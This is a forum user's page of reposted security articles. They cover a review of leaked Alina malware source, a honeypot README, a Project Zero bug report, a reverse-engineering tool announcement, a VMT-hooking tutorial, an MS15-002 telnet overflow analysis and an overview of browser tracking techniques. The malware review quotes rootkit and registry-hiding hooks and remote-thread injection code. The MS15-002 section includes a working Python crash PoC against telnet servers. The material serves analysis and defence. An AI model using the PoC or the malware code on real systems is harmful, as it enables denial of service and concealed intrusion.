Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. I got on my hands recently the source code of Alina "sparks", the main 'improvement' that everyone is talking about and make the price of this malware rise is the rootkit feature. Josh Grunzweig did already an interesting coverage of a sample, but what worth this new version ? InjectedDLL.c from the source is a Chinese copy-paste of ring3?Hook NtQueryDirectoryFile???? - ?sir - ??? and commented out, replaced with two kernel32 hooks instead, like if the author cannot into hooks a comment is still in Chinese as you can see on the screenshot. + this: [FONT=monospace] LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName,LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData) { LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData); if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0) { Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData); } return Result; } ... // Registry Value Hiding Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext); Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);[/FONT] So many stupid mistakes in the code, no sanity checks in hooks, nothing stable. Haven't looked at a sample in the wild but i doubt it work anyhow. Actual rootkit source (body stored as hex array in RootkitDriver.inc c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap. This x86-32 driver is responsible for NtQuerySystemInformation, NtEnumerateValueKey, NtQueryDirectoryFile SSDT hooking. Driver is ridiculously simple: [FONT=monospace] NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc; BuildMdlForSSDT(); InitStrings(); SetHooks(); return STATUS_SUCCESS; }[/FONT] [FONT=monospace] BOOL SetHooks() { if ( !NtQuerySystemInformationOrig ) NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook); if ( !NtEnumerateValueKeyOrig ) NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook); if ( !NtQueryDirectoryFileOrig ) NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook); return TRUE; }[/FONT] All of them hide 'windefender' target process, file, registry. [FONT=monospace] void InitStrings() { RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe"); RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe"); RtlInitUnicodeString(&WindefenderRegistryString, L"windefender"); }[/FONT] It's the malware name, Josh pointed also in this direction on his analysis. First submitted on VT the 2013-10-17 17:27:10 UTC ( 1 year, 2 months ago ) https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/ Overall that dll seems unusued, alina project uses driver i mentioned. As for project itself, it's still an awful piece of students lab work, here is some log just from attempt to compile: source\grab\base.cpp(78) If SHGetSpecialFolderPath returns FALSE, strcat to SourceFilePath will be used anyway. Two copy-pasted methods with same mistake: source\grab\base.cpp(298) source\grab\base.cpp(433) Leaking process information handle pi.hProcess. Using hKey from failed function call: [FONT=monospace] source\grab\base.cpp(316): if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) { RegCloseKey(hKey); [/FONT] pThread could be NULL, this is checked only in WriteProcessMemory but not in CreateRemoteThread: [FONT=monospace] source\grab\monitoringthread.cpp(110): LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten); HANDLE ThreadHandle = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);[/FONT] Where hwid declared as char hwid[8]; Reading invalid data from hdr->hwid: the readable size is 8 bytes, but 18 bytes may be read: source\grab\panelrequest.cpp(73): memcpy(outkey, hdr->hwid, 18); Realloc might return null pointer: assigning null pointer to buf, which is passed as an argument to realloc, will cause the original memory block to be leaked: source\grab\panelrequest.cpp(173) The prior call to strncpy might not zero-terminate string Result: source\grab\scanner.cpp(159) Return value of ReadFile ignored. If it will fail anywhere code will be corrupted as cmd variable is not initialized: source\grab\watcher.cpp(61) source\grab\watcher.cpp(64) source\grab\watcher.cpp(71) Signed unsigned mismatch: source\grab\rootkitinstaller.cpp(47) Unreferenced local variable hResult: source\grab\base.cpp(158) Using TerminateThread does not allow proper thread clean up: source\grab\watcher.cpp(125) Now related to 'editions' sparks have some, for examples the pipes, mutexes, user-agents, process black-list but most of these editions are minors things that anybody can do to 'customise' his own bot. In any case that can count as a code addition or something 'new' For the panel... well it's like the bot, nothing changed at all. It's still the same ugly design, still the same files with same modifications timestamp, no code addition, still the same cookie auth crap like if the coder can't use session in php and so on... To conclude, the main improvement is a copy/pasted rootkit who don't work, i don't know how many bad guys bought this source for 1k or more but that definitely not worth it. Overall it's a good example of how people can take a code, announce a rootkit to impress and play everything on malware notoriety. This remind me the guys who announced IceIX on malware forums and finally the samples was just a basic ZeuS with broken improvements. Hi Benson. Posted by Steven K at 00:07 Sursa: http://www.xylibox.com/2015/01/alina-sparks-source-code-review.html
  2. Nytro

    mailoney

    [h=1]About[/h] Mailoney is a SMTP Honeypot I wrote just to have fun learning Python. The Open Relay module emulates an Open Relay and writes attempted emails to a log file. Similarly, the Authentication modules will capture credentials and write those to a log file. [h=1][/h][h=1]Usage[/h] You'll likely need to run this with elevated permissions as required to open sockets on special ports. python mailoney.py -s mailbox <options> -h, --help Show this help message and exit -i <ip address> The IP address to listen on (defaults to localhost) -p <port> The port to listen on (defaults to 25) -s mailserver This will generate a fake hostname -t <type> HoneyPot type open_relay Emulates an open relay postfix_creds Emulates PostFix authentication server, collects credentials examples: python mailoney.py -s mailbox -i 10.10.10.1 -p 990 -t postfix_creds [h=1][/h][h=1]ToDo[/h] Add modules for EXIM, Microsoft, others Build in Error Handling Add a Daemon flag to background process. Sursa: https://github.com/awhitehatter/mailoney
      • 1
      • Thanks
  3. Windows: Impersonation Check Bypass With CryptProtectMemory and CRYPTPROTECTMEMORY_SAME_LOGON flag Reported by fors.. @google.com, Oct 17, 2014 Platform: Windows 7, 8.1 Update 32/64 bit Class: Security Bypass/Information Disclosure The function CryptProtectMemory allows an application to encrypt memory for one of three scenarios, process, logon session and computer. When using the logon session option (CRYPTPROTECTMEMORY_SAME_LOGON flag) the encryption key is generated based on the logon session identifier, this is for sharing memory between processes running within the same logon. As this might also be used for sending data from one process to another it supports extracting the logon session id from the impersonation token. The issue is the implementation in CNG.sys doesn't check the impersonation level of the token when capturing the logon session id (using SeQueryAuthenticationIdToken) so a normal user can impersonate at Identification level and decrypt or encrypt data for that logon session. This might be an issue if there's a service which is vulnerable to a named pipe planting attack or is storing encrypted data in a world readable shared memory section. This behaviour of course might be design, however not having been party to the design it's hard to tell. The documentation states that the user must impersonate the client, which I read to mean it should be able to act on behalf of the client rather than identify as the client. Attached is a simple PoC which demonstrates the issue. To reproduce follow the steps. 1) Execute Poc_CNGLogonSessionImpersonation.exe from the command line 2) The program should print "Encryption doesn't match" to indicate that the two encryptions of the same data was not a match, implying the key was different between them. Expected Result: Both calls should return the same encrypt data, or the second call should fail Observed Result: Both calls succeed and return different encrypted data This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. [TABLE] [TR] [TD] [/TD] [TD] Poc_CNGLogonSessionImpersonation.zip 62.4 KB Download[/TD] [/TR] [/TABLE] Sursa: https://code.google.com/p/google-security-research/issues/detail?id=128
  4. [h=1]CodeInspect says “Hello World”: A new Reverse-Engineering Tool for Android and Java Bytecode[/h] Posted on 2014/12/26 by Siegfried Rasthofer We are very happy to announce a new tool in our toolchain: CodeInspect - A Jimple-based Reverse-Engineering framework for Android and Java applications. Developing an Android application in an IDE is very convenient since features like code completion, “Open Declaration“, renaming variables, searching files etc. help the developer a lot. Especially code-debugging is a very important feature in IDEs. Usually, all those features are available for the source code and not for the bytecode, since they support the developer not a reverse-engineer. Well, but all those features would be be also very helpful for reverse-engineering Android or Java applications. This is the reason why we came up with a new reverse-engineering framework that works on the intermediate representation Jimple and supports all the features above and a lot more. In the following we give a detailed description about CodeInspect and its features. CodeInspect supports as input format a complete Android Application Package (apk), just the Android bytecode (dex-file) or a jar-file. In the following we will describe the different features based on a malicious Android apk. [h=1]Framework Overview[/h] The figure above is a screenshot of CodeInspect. As one can see, CodeInspect is based on the Eclipse RCP framework. One can define a workspace with different projects (apks). Furthermore, CodeInspect contains different perspectives, different views and a new editor for the intermediate representation. The main perspectives are the “CodeInspect” perspective as shown in the screenshot and the “Debug” perspective which is known from the general Eclipse IDE including views for “Expressions”, “Breakpoints” and “Variables”. Other basic views in the CodeInspect perspective are: Project Explorer: It shows all the important files in a readable format of an apk Outline: Shows all the fields and methods of a specific class. By clicking on an item, one directly jumps to the corresponding line in code. Console: Shows the console output. Problems: Shows all the warning and errors (e.g., compilation errors) that occur in the project. Sursa: CodeInspect says “Hello World”: A new Reverse-Engineering Tool for Android and Java Bytecode | Secure Software Engineering
  5. Virtual Method Table (VMT) Hooking Posted on January 15, 2015 by admin This post will cover the topic of hooking a classes’ virtual method table. This is a useful technique that has many applications, but is most commonly seen in developing game hacks. For example, employing VMT hooking of objects in a Direct3D/OpenGL graphics engine is how in-game overlays are displayed. Virtual Method Tables (or vtables) Usage of VMTs, in the context of C++ for this post, is how polymorphism is implemented at the language level. Internally, the VMT is represented as an array of function pointers, and typically resides at the beginning or end of the memory layout of the object. Whenever a C++ class declares a virtual function, the compiler will add an entry in to the VMT for it. If a class inherits from a base object and overrides a base virtual function, then the pointer to the overriden function will be present in the derived objects VMT. For example, take the following code, compiled with the VS 2013 compiler on an x86 system: [TABLE] [TR] [TD=class: code]class Base { public: Base() { printf("- Base::Base\n"); } virtual ~Base() { printf("- Base::~Base\n"); } void A() { printf("- Base::A\n"); } virtual void B() { printf("- Base:\n"); } virtual void C() { printf("- Base::C\n"); } }; class Derived final : public Base { public: Derived() { printf("- Derived::Derived\n"); } ~Derived() { printf("- Derived::~Derived\n"); } void B() override { printf("- Derived:\n"); } void C() override { printf("- Derived::C\n"); } };[/TD] [/TR] [/TABLE] with the instances of Base and Derived created as follows: [TABLE] [TR] [TD=class: code]Base base; Derived derived; Base *pBase = new Derived;[/TD] [/TR] [/TABLE] The class Base has three virtual functions: ~Base, B, and C. The class Derived, which inherits from Base overrides the two virtual functions B and C. In memory, the VMT for Base will contain ~Base, B, and C, as can be inspected with the debugger: while the VMT for the two Derived instances contain ~Derived, B, and C, but with different addresses for each than the ones in Base (see below). So how are these actually used? Take, for example, a function that takes a pointer to a Base instance and invokes the functions A, B, and C, on it: [TABLE] [TR] [TD=class: code]void Invoke(Base * const pBase) { pBase->A(); pBase->B(); pBase->C(); }[/TD] [/TR] [/TABLE] and is invoked in the following manner: [TABLE] [TR] [TD=class: code] Invoke(&base); Invoke(&derived); Invoke(pBase);[/TD] [/TR] [/TABLE] The Invoke function disassembled for x86 is as follows: pBase->A(); 004012C9 8B 4D 08 mov ecx,dword ptr [pBase] 004012CC E8 8F FE FF FF call Base::A (0401160h) pBase->B(); 004012D1 8B 45 08 mov eax,dword ptr [pBase] 004012D4 8B 10 mov edx,dword ptr [eax] 004012D6 8B 4D 08 mov ecx,dword ptr [pBase] 004012D9 8B 42 04 mov eax,dword ptr [edx+4] 004012DC FF D0 call eax pBase->C(); 004012DE 8B 45 08 mov eax,dword ptr [pBase] 004012E1 8B 10 mov edx,dword ptr [eax] 004012E3 8B 4D 08 mov ecx,dword ptr [pBase] 004012E6 8B 42 08 mov eax,dword ptr [edx+8] 004012E9 FF D0 call eax This disassembly shows exactly what is going on under the hood with relation to polymorphism. For the invocations to B and C, the compiler moves the address of the object in to the EAX register. This is then dereferenced to get the base of the VMT and stored in the EDX register. The appropriate VMT entry for the function is found by using EDX as an index and storing the address in EAX. This function is then called. Since Base and Derived have different VMTs, this code will call different functions — the appropriate ones — for the appropriate object type. Seeing how it’s done under the hood also allows us to easily write a function to print the VMT. [TABLE] [TR] [TD=class: code]void PrintVTable(Base * const pBase) { unsigned int *pVTableBase = (unsigned int *)(*(unsigned int *)pBase); printf("First: %p\n" "Second: %p\n" "Third: %p\n", *pVTableBase, *(pVTableBase + 1), *(pVTableBase + 2)); }[/TD] [/TR] [/TABLE] Hooking the VMT Knowing the layout of the VMT makes it trivial to hook. To accomplish this, all that is needed is to overwrite the entry in the VMT with the address of the desired hook function. This is done by using the VirtualProtect function to set the appropriate memory permissions alongside with memcpy to write in the desired hook address. Note that memcpy is used since everything resides within the same address space, otherwise WriteProcessMemory would have to be used. A hooking routine might look like the following: [TABLE] [TR] [TD=class: code]void HookVMT(Base * const pBase) { unsigned int *pVTableBase = (unsigned int *)(*(unsigned int *)pBase); unsigned int *pVTableFnc = (unsigned int *)((pVTableBase + 1)); void *pHookFnc = (void *)VMTHookFnc; SIZE_T ulOldProtect = 0; (void)VirtualProtect(pVTableFnc, sizeof(void *), PAGE_EXECUTE_READWRITE, &ulOldProtect); memcpy(pVTableFnc, &pHookFnc, sizeof(void *)); (void)VirtualProtect(pVTableFnc, sizeof(void *), ulOldProtect, &ulOldProtect); }[/TD] [/TR] [/TABLE] and VMTHook having a simple definition of [TABLE] [TR] [TD=class: code]void __fastcall VMTHookFnc(void *pEcx, void *pEdx) { Base *pThisPtr = (Base *)pEcx; printf("In VMTHookFnc\n"); }[/TD] [/TR] [/TABLE] Here the fastcall calling convention is used to easily retrieve the this pointer, which is typically stored in the ECX register. Applications The application of this technique will show how to hook IDXGISwapChain::Present and allow for rendering/overlaying of text on a Direct3D10 application. This is not the only way to overlay text, nor necessarily the best, but still provides an adequate example to illustrate the point. The target application will be a Direct3D10 sample provided by the June 2010 DirectX SDK. See /Samples/C++/Direct3D10/Tutorials/Tutorial01 in the SDK. The sample application initializes the Direct3D device and swap chain with a call to D3D10CreateDeviceAndSwapChain then simply sets up a view and renders a blue background on the window (screenshot below). To overlay text on a Direct3D application, the IDXGISwapChain object must be obtained. Then the Present function of the interface must be hooked, since that is the function responsible for showing the rendered image to the user. This is done here by hooking D3D10CreateDeviceAndSwapChain. Once this function is hooked, the hook will call the real D3D10CreateDeviceAndSwapChain function in order to set up the IDXGISwapChain interface. Then the VMT entry for Present will be replaced with a hooked version that renders text. Put into code it looks like the following: [TABLE] [TR] [TD=class: code]HRESULT WINAPI D3D10CreateDeviceAndSwapChainHook(IDXGIAdapter *pAdapter, D3D10_DRIVER_TYPE DriverType, HMODULE Software, UINT Flags, UINT SDKVersion, DXGI_SWAP_CHAIN_DESC *pSwapChainDesc, IDXGISwapChain **ppSwapChain, ID3D10Device **ppDevice) { printf("In D3D10CreateDeviceAndSwapChainHook\n"); //Create the device and swap chain HRESULT hResult = pD3D10CreateDeviceAndSwapChain(pAdapter, DriverType, Software, Flags, SDKVersion, pSwapChainDesc, ppSwapChain, ppDevice); //Save the device and swap chain interface. //These aren't used in this example but are generally nice to have addresses to if(ppSwapChain == NULL) { printf("Swap chain is NULL.\n"); return hResult; } else { pSwapChain = *ppSwapChain; } if(ppDevice == NULL) { printf("Device is NULL.\n"); return hResult; } else { pDevice = *ppDevice; } //Get the vtable address of the swap chain's Present function and modify it with our own. //Save it to return to later in our Present hook if(pSwapChain != NULL) { DWORD_PTR *SwapChainVTable = (DWORD_PTR *)pSwapChain; SwapChainVTable = (DWORD_PTR *)SwapChainVTable[0]; printf("Swap chain VTable: %X\n", SwapChainVTable); PresentAddress = (pPresent)SwapChainVTable[8]; printf("Present address: %X\n", PresentAddress); DWORD OldProtections = 0; VirtualProtect(&SwapChainVTable[8], sizeof(DWORD_PTR), PAGE_EXECUTE_READWRITE, &OldProtections); SwapChainVTable[8] = (DWORD_PTR)PresentHook; VirtualProtect(&SwapChainVTable[8], sizeof(DWORD_PTR), OldProtections, &OldProtections); } //Create the font that we will be drawing with CreateDrawingFont(); return hResult; }[/TD] [/TR] [/TABLE] CreateDrawingFont simply sets up a ID3DX10Font to draw with. Now since the VMT entry was replaced, PresentHook will be invoked instead of Present. Here is where the drawing can be done. [TABLE] [TR] [TD=class: code]HRESULT WINAPI PresentHook(IDXGISwapChain *thisAddr, UINT SyncInterval, UINT Flags) { //printf("In Present (%X)\n", PresentAddress); RECT Rect = { 100, 100, 200, 200 }; pFont-&gt;DrawTextW(NULL, L"Hello, World!", -1, &Rect, DT_CENTER | DT_NOCLIP, RED); return PresentAddress(thisAddr, SyncInterval, Flags); }[/TD] [/TR] [/TABLE] I chose a different calling convention here than for the earlier example code, but everything still functions the same. The end result shows the Present hook successfully rendering the text: A few important caveats about doing it this way: The hook must be installed prior to the call to D3D10CreateDeviceAndSwapChain. Otherwise handles to the device and swap chain won’t be obtained. ID3DX10Font::DrawText can mess with the blend states, shaders, rasterizer, etc. Overlaying text on an application that makes use of these requires the hook developer to account for this and save/restore the states properly. The source code for the VMT hook example, the slightly modified Direct3D10 sample application, and the Direct3D10 hook can be found here. The hook uses Microsoft Detours as a dependency to perform the initial hooking of D3D10CreateDeviceAndSwapChain. Sursa: http://www.codereversing.com/blog/?p=181
  6. 2015/01/16 9:09 | cssembly | binary security , vulnerability analysis | accounting for a seat first | donate author 0x00 principle vulnerability analysis MS15-002 is Microsoft telnet service buffer overflow vulnerability, the following principles to analyze and construct its POC. telnet service process for tlntsvr.exe, for each client connection will start executing a corresponding tlntsess.exe process is tlntsess.exe patched files through a patch over right, identify vulnerabilities position follows function [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2) [/TD] [/TR] [/TABLE] Patch before, this function are: After the patch, the function is: That turned a buffer into two, calling finish [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2,&v13,&v9,v6)[/TD] [/TR] [/TABLE] After the first data to judge the length of the buffer, if [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](unsigned int)(v9 - (unsigned __int8 *)&Src - 1) <= 0x7FE [/TD] [/TR] [/TABLE] It is determined that the target buffer can accommodate the number of characters, if [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](unsigned int)((char *)v14 + v7 - (_DWORD)&Dst) >= 0x800[/TD] [/TR] [/TABLE] Exit, else [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]memcpy_s(v14, (char *)&v18 - (_BYTE *)v14, &Src, v9 - (unsigned __int8 *)&Src)[/TD] [/TR] [/TABLE] Copy data to Dst buffer. The front patch, only one buffer, call [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)[/TD] [/TR] [/TABLE] Before the first data buffer length determination, v13 only when - & Src <= 2048 when calling, v13 point available buffer head, and [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)[/TD] [/TR] [/TABLE] Function of the call, the value v13 will be modified, if the call [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]void __thiscall CRFCProtocol::DoTxBinary(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD] [/TR] [/TABLE] Function, you can see the function changes the value of the parameter 3, that * a3 + = 3. After analysis can know if v13 - & Src = 2047, then meet v13 - & Src <= 2048 condition, then if (* (& off_1011008 + 3 * v7)) (v3, & v14, & v13, * v6) call is CRFCProtocol: : DoTxBinary function and perform the following sequence of instructions, apparently led to a buffer overflow. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]v7 = *a3; *v7 = -1; v7[1] = -3; v7[2] = a4; v7[3] = 0; *a3 += 3;[/TD] [/TR] [/TABLE] Patched version, using two buffers, the temporary buffer pointer passed to v9 [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2,&v13,&v9,v6) [/TD] [/TR] [/TABLE] After the function returns the data to determine the length of the buffer pointed v9, and finally determine whether the destination buffer space available to accommodate the remaining data in the buffer pointed v9, namely (unsigned int) ((char *) v14 + v7 - ( _DWORD) & Dst)> = 0x800 judgment. 0x01 environment to build and construct POC Win7 install and start the telnet server, perform net user exp 123456 / ADD increase user exp, via net localgroup TelnetClients exp / ADD TelnetClients add the user to the group, so that you can log in through a telnet client. Debugging found [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)[/TD] [/TR] [/TABLE] In a2 for the received data length, up to 0x400, v6 point the received data, apparently in order to trigger the overflow must be called ((& off_1011008 + 3 * v7)) (v3, & v14, & v13, * v6), the let the data arising from expansion, to ensure data processing after the Src buffer length is greater than 0x800. View (* (& off_1011008 + 3 * v7)) (v3, & v14, & v13, * v6) of the function can be called, [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]void __thiscall CRFCProtocol::AreYouThere(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD] [/TR] [/TABLE] Will obviously result in data expansion, a4 is the received data in a byte, after execution, a3 will be written into the buffer pointed to 9 bytes of fixed data. By wireshark cut package, simply for protocol analysis, construction POC follows, let the program repeatedly CRFCProtocol :: AreYouThere function and eventually trigger an exception. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8[/TD] [TD=class: code]import socket address = ('192.168.172.152', 23) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(address) data = "\xff\xf6" * 0x200 s.send(data) s.recv(512) s.close()[/TD] [/TR] [/TABLE] Run poc, in [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket( CRFCProtocol *this, unsigned __int32 *a2)[/TD] [/TR] [/TABLE] Set a breakpoint, you can see after the break a2 = 0x400, (DWORD) ((DWORD *) (this + 0x1E40) + 0x16c8) point to get the data received. Set a breakpoint before the function returns, after the execution, you can see __security_check_cookie detected a stack overflow, triggering an exception, break into the debugger. Disclaimer: Prohibit unauthorized reproduced cssembly @ clouds Knowledge SursaL https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F4621&edit-text=
  7. Technical analysis of client identification mechanisms Written by Artur Janc <aaj@google.com> and Michal Zalewski <lcamtuf@google.com> In common use, the term “web tracking” refers to the process of calculating or assigning unique and reasonably stable identifiers to each browser that visits a website. In most cases, this is done for the purpose of correlating future visits from the same person or machine with historical data. Some uses of such tracking techniques are well established and commonplace. For example, they are frequently employed to tell real users from malicious bots, to make it harder for attackers to gain access to compromised accounts, or to store user preferences on a website. In the same vein, the online advertising industry has used cookies as the primary client identification technology since the mid-1990s. Other practices may be less known, may not necessarily map to existing browser controls, and may be impossible or difficult to detect. Many of them - in particular, various methods of client fingerprinting - have garnered concerns from software vendors, standards bodies, and the media. To guide us in improving the range of existing browser controls and to highlight the potential pitfalls when designing new web APIs, we decided to prepare a technical overview of known tracking and fingerprinting vectors available in the browser. Note that we describe these vectors, but do not wish this document to be interpreted as a broad invitation to their use. Website owners should keep in mind that any single tracking technique may be conceivably seen as inappropriate, depending on user expectations and other complex factors beyond the scope of this doc. We divided the methods discussed on this page into several categories: explicitly assigned client-side identifiers, such as HTTP cookies; inherent client device characteristics that identify a particular machine; and measurable user behaviors and preferences that may reveal the identity of the person behind the keyboard (or touchscreen). After reviewing the known tracking and fingerprinting techniques, we also discuss potential directions for future work and summarize some of the challenges that browser and other software vendors would face trying to detect or prevent such behaviors on the Web. Contents 1 Explicitly assigned client-side identifiers 1.1 HTTP cookies 1.2 Flash LSOs 1.3 Silverlight Isolated Storage 1.4 HTML5 client-side storage mechanisms 1.5 Cached objects 1.6 Cache metadata: ETag and Last-Modified 1.7 HTML5 AppCache 1.8 Flash resource cache 1.9 SDCH dictionaries 1.10 Other script-accessible storage mechanisms 1.11 Lower-level protocol identifiers [*]2 Machine-specific characteristics 2.1 Browser-level fingerprints 2.2 Network configuration fingerprints [*]3 User-dependent behaviors and preferences [*]4 Fingerprinting prevention and detection challenges [*]5 Potential directions for future work Explicitly assigned client-side identifiers The canonical approach to identifying clients across HTTP requests is to store a unique, long-lived token on the client and to programmatically retrieve it on subsequent visits. Modern browsers offer a multitude of ways to achieve this goal, including but not limited to: Plain old HTTP cookies, Cookie-equivalent plugin features - most notably, Flash Local Shared Objects and Silverlight Isolated Storage, HTML5 client storage mechanisms, including localStorage, File, and IndexedDB APIs, Unique markers stored within locally cached resources or in cache metadata - e.g., Last-Modified and ETag, Fingerprints derived from browser-generated Origin-Bound Certificates for SSL connections, Bits encoded in HTTP Strict Transport Security pin lists across several attacker-controlled host names, Data encoded in SDCH compression dictionaries and dictionary metadata, ...and more. We believe that the availability of any one of these mechanisms is sufficient to reliably tag clients and identify them later on; in addition to this, many such identifiers can be deployed in a manner that conceals the uniqueness of the ID assigned to a particular client. On the flip side, browsers provide users with some degree of control over the behavior of at least some of these APIs, and with several exceptions discussed later on, the identifiers assigned in this fashion do not propagate to other browser profiles or to private browsing sessions. The remainder of this section provides a more in-depth overview of several notable examples of client tagging schemes that are within the reach of web apps. HTTP cookies HTTP cookies are the most familiar and best-understood method for persisting data on the client. In essence, any web server may issue unique identifiers to first-time visitors as a part of a HTTP response, and have the browser play back the stored values on all future requests to a particular site. All major browsers have for years been equipped with UIs for managing cookies; a large number of third-party cookie management and blocking software is available, too. In practice, however, external research has implied that only a minority of users regularly review or purge browser cookies. The reasons for this are probably complex, but one of them may be that the removal of cookies tends to be disruptive: contemporary browsers do not provide any heuristics to distinguish between the session cookies that are needed to access the sites the user is logged in, and the rest. Some browsers offer user-configurable restrictions on the ability for websites to set “third-party” cookies (that is, cookies coming from a domain other than the one currently displayed in the address bar - a behavior most commonly employed to serve online ads or other embedded content). It should be noted that the existing implementations of this setting will assign the “first-party” label to any cookies set by documents intentionally navigated to by the user, as well as to ones issued by content loaded by the browser as a part of full-page interstitials, HTTP redirects, or click-triggered pop-ups. Compared to most other mechanisms discussed below, overt use of HTTP cookies is fairly transparent to the user. That said, the mechanism may be used to tag clients without the use of cookie values that obviously resemble unique IDs. For example, client identifiers could be encoded as a combination of several seemingly innocuous and reasonable cookie names, or could be stored in metadata such as paths, domains, or cookie expiration times. Because of this, we are not aware of any means for a browser to reliably flag HTTP cookies employed to identify a specific client in this manner. Just as interestingly, the abundance of cookies means that an actor could even conceivably rely on the values set by others, rather than on any newly-issued identifiers that could be tracked directly to the party in question. We have seen this employed for some rich content ads, which are usually hosted in a single origin shared by all advertisers - or, less safely, are executed directly in the context of the page that embeds the ad. Flash LSOs Local Shared Objects are the canonical way to store client-side data within Adobe Flash. The mechanism is designed to be a direct counterpart to HTTP cookies, offering a convenient way to maintain session identifiers and other application state on a per-origin basis. In contrast to cookies, LSOs can be also used for structured storage of data other than short snippets of text, making such objects more difficult to inspect and analyze in a streamlined way. In the past, the behavior of LSOs within the Flash plugin had to be configured separately from any browser privacy settings, by visiting a lesser-known Flash Settings Manager UI hosted on macromedia.com (standalone installs of Flash 10.3 and above supplanted this with a Control Panel / System Preferences dialog available locally on the machine). Today, most browsers offer a degree of integration: for example, clearing cookies and other site data will generally also remove LSOs. On the flip side, more nuanced controls may not be synchronized: say, the specific setting for third-party cookies in the browser is not always reflected by the behavior of LSOs. From a purely technical standpoint, the use of Local Shared Objects in a manner similar to HTTP cookies is within the apparent design parameters for this API - but the reliance on LSOs to recreate deleted cookies or bypass browser cookie preferences has been subject to public scrutiny. Silverlight Isolated Storage Microsoft Silverlight is a widely-deployed applet framework bearing many similarities to Adobe Flash. The Silverlight equivalent of Flash LSOs is known as Isolated Storage. The privacy settings in Silverlight are typically not coupled to the underlying browser. In our testing, values stored in Isolated Storage survive clearing cache and site data in Chrome, Internet Explorer and Firefox. Perhaps more surprisingly, Isolated Storage also appears to be shared between all non-incognito browser windows and browser profiles installed on the same machine; this may have consequences for users who rely on separate browser instances to maintain distinct online identities. As with LSOs, reliance on Isolated Storage to store session identifiers and similar state information does not present issues from a purely technical standpoint. That said, given that the mechanism is not currently managed via browser controls, its use of for client identification is not commonplace and thus may be viewed as less transparent than standard cookies. HTML5 client-side storage mechanisms HTML5 introduces a range of structured data storage mechanisms on the client; this includes localStorage,the File API, and IndexedDB. Although semantically different from each other, all of them are designed to allow persistent storage of arbitrary blobs of binary data tied to a particular web origin. In contrast to cookies and LSOs, there are no significant size restrictions on the data stored with these APIs. In modern browsers, HTML5 storage is usually purged alongside other site data, but the mapping to browser settings isn’t necessarily obvious. For example, Firefox will retain localStorage data unless the user selects “offline website data” or “site preferences” in the deletion dialog and specifies the time range as “everything” (this is not the default). Another idiosyncrasy is the behavior of Internet Explorer,where the data is retained for the lifetime of a tab for any sites that are open at the time the operation takes place. Beyond that, the mechanisms do not always appear to follow the restrictions on persistence that apply to HTTP cookies. For example, in our testing, 